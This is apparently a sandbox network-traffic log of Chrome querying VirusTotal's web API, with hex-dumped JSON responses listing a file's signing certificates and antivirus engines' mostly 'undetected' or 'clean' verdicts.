                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTMxODcyOTI0NjctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5NQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 63b2dc3b0f1093691fa550b1487b6a47
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 411277
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 30 37 33 61 38 37 36 38 32 39 65 35 33 35 39 61 32 32 34 63 61 64 31 35 35 37 63 31 61 64 38 66 61 38 61 31 31 33 36 61 32 38 35 36 37 64 38 33 66 61 62 32 34 31 62 36 66 65 30 34 63 32 35 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 30 37 33 61 38 37 36 38 32 39 65 35 33 35 39 61 32 32 34 63 61 64 31 35 35 37 63 31 61 64 38
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "073a876829e5359a224cad1557c1ad8fa8a1136a28567d83fab241b6fe04c25d", "type": "file", "links": { "self": "https://www.virustotal.com/ui/files/073a876829e5359a224cad1557c1ad8
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 22 6c 61 73 74 5f 61 6e 61 6c 79 73 69 73 5f 64 61 74 65 22 3a 20 31 37 31 34 30 30 31 30 35 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 61 6e 69 6e 67 66 75 6c 5f 6e 61 6d 65 22 3a 20 22 41 70 70 78 53 69 67 6e 61 74 75 72 65 2e 70 37 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 67 6e 61 74 75 72 65 5f 69 6e 66 6f 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 67 6e 65 72 73 20 64 65 74 61 69 6c 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 56 61 6c 69 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "last_analysis_date": 1714001052, "meaningful_name": "AppxSignature.p7x", "signature_info": { "signers details": [ { "status": "Valid",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC545INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 68 75 6d 62 70 72 69 6e 74 22 3a 20 22 43 31 30 42 42 37 36 41 44 34 45 45 38 31 35 32 34 32 34 30 36 41 31 45 33 45 31 31 31 37 46 46 45 43 37 34 33 44 34 46 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 56 61 6c 69 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 69 64 20 75 73 61 67 65 22 3a 20 22 43 6f 64 65 20 53 69 67 6e 69 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "thumbprint": "C10BB76AD4EE815242406A1E3E1117FFEC743D4F" }, { "status": "Valid", "valid usage": "Code Signing",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 36 20 34 38 20 39 33 20 46 35 20 45 35 20 44 37 20 34 41 20 34 38 20 33 41 20 34 45 20 46 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 65 72 74 20 69 73 73 75 65 72 22 3a 20 22 47 6c 6f 62 61 6c 53 69 67 6e 20 43 6f 64 65 20 53 69 67 6e 69 6e 67 20 52 6f 6f 74 20 52 34 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 68 75 6d 62 70 72 69 6e 74 22 3a 20 22 34 45 46 43 33 31 34 36 30 43 36 31 39 45 43 41 45 35 39 43 31 42 43 45 32 43 30 30 38 30 33 36 44 39 34 43 38 34 42 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: 6 48 93 F5 E5 D7 4A 48 3A 4E F8", "cert issuer": "GlobalSign Code Signing Root R45", "thumbprint": "4EFC31460C619ECAE59C1BCE2C008036D94C84B8" } ],
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 20 20 20 20 20 20 20 22 75 6e 64 65 74 65 63 74 65 64 22 3a 20 36 33 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 66 69 72 6d 65 64 2d 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 61 69 6c 75 72 65 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 2d 75 6e 73 75 70 70 6f 72 74 65 64 22 3a 20 31 32 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 6e 69
                                                                                                                                                                                                                    Data Ascii: "undetected": 63, "harmless": 0, "timeout": 0, "confirmed-timeout": 0, "failure": 0, "type-unsupported": 12 }, "uni
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 2e 33 2e 31 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 46 69 72 65 45 79 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20
                                                                                                                                                                                                                    Data Ascii: .3.1.0", "engine_update": "20240424", "category": "undetected", "result": null }, "FireEye": { "method": "blacklist",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 36 2e 30 2e 36 2e 36 35 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4d 61 6c 77 61 72 65 62 79 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b
                                                                                                                                                                                                                    Data Ascii: 6.0.6.653", "engine_update": "20240424", "category": "undetected", "result": null }, "Malwarebytes": { "method": "black
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 3a 20 22 31 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4b 37 47 57 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: : "1.0", "engine_update": "20240424", "category": "undetected", "result": null }, "K7GW": { "method": "blacklist",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1152INData Raw: 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 39 2e 35 2e 36 39 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 79 6d 61 6e 74 65 63 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a
                                                                                                                                                                                                                    Data Ascii: e_version": "9.5.690", "engine_update": "20240424", "category": "undetected", "result": null }, "Symantec": { "method":
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 32 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 76 61 73 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 76 61 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: 24", "category": "undetected", "result": null }, "Avast": { "method": "blacklist", "engine_name": "Avast",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    143192.168.2.164989474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC958OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQxMjE3MDM3MjktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 0f094334d512af367fb35d0c6e1a0827
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 101879
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 30 38 63 38 65 65 65 39 61 35 34 39 38 63 32 61 32 30 34 66 30 31 37 61 65 63 39 38 33 37 35 31 35 36 34 62 31 39 62 63 61 38 33 65 34 61 66 66 64 32 62 39 31 36 34 38 36 37 66 32 65 66 32 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 75 72 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 75 72 6c 73 2f 30 38 63 38 65 65 65 39 61 35 34 39 38 63 32 61 32 30 34 66 30 31 37 61 65 63 39 38 33 37 35 31 35
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "08c8eee9a5498c2a204f017aec983751564b19bca83e4affd2b9164867f2ef20", "type": "url", "links": { "self": "https://www.virustotal.com/ui/urls/08c8eee9a5498c2a204f017aec9837515
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 69 65 73 22 3a 20 7b 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 61 73 74 5f 73 75 62 6d 69 73 73 69 6f 6e 5f 64 61 74 65 22 3a 20 31 37 31 34 30 32 32 33 32 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 72 73 74 5f 73 75 62 6d 69 73 73 69 6f 6e 5f 64 61 74 65 22 3a 20 31 37 31 33 32 30 30 39 32 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 73 5f 73 75 62 6d 69 74 74 65 64 22 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 22 2c 0a
                                                                                                                                                                                                                    Data Ascii: "timeout": 0 }, "categories": {}, "last_submission_date": 1714022320, "first_submission_date": 1713200922, "times_submitted": 2, "title": "",
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC548INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 44 4d 49 4e 55 53 4c 61 62 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 69 6f 6e 69 63 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "method": "blacklist", "engine_name": "ADMINUSLabs", "category": "harmless", "result": "clean" }, "Lionic": {
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 72 69 6d 69 6e 61 6c 20 49 50 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 49 4c 61 62 73 20 28 4d 4f 4e 49 54 4f 52 41 50 50 29 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "engine_name": "Criminal IP", "category": "harmless", "result": "clean" }, "AILabs (MONITORAPP)": { "method": "blacklist",
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 72 63 53 69 67 68 74 20 54 68 72 65 61 74 20 49 6e 74 65 6c 6c 69 67 65 6e 63 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 72 63 53 69 67 68 74 20 54 68 72 65 61 74 20 49 6e 74 65 6c 6c 69 67 65 6e 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, "ArcSight Threat Intelligence": { "method": "blacklist", "engine_name": "ArcSight Threat Intelligence", "category": "undetected",
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1280INData Raw: 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 42 6b 61 76 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 6c 6f 63 6b 4c 69 73 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: "engine_name": "Bkav", "category": "undetected", "result": "unrated" }, "BlockList": { "method": "blacklist", "
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 6e 6f 72 74 20 49 50 20 73 61 6d 70 6c 65 20 6c 69 73 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 53 6e 6f 72 74 20 49 50 20 73 61 6d 70 6c 65 20 6c 69 73
                                                                                                                                                                                                                    Data Ascii: "category": "harmless", "result": "clean" }, "Snort IP sample list": { "method": "blacklist", "engine_name": "Snort IP sample lis
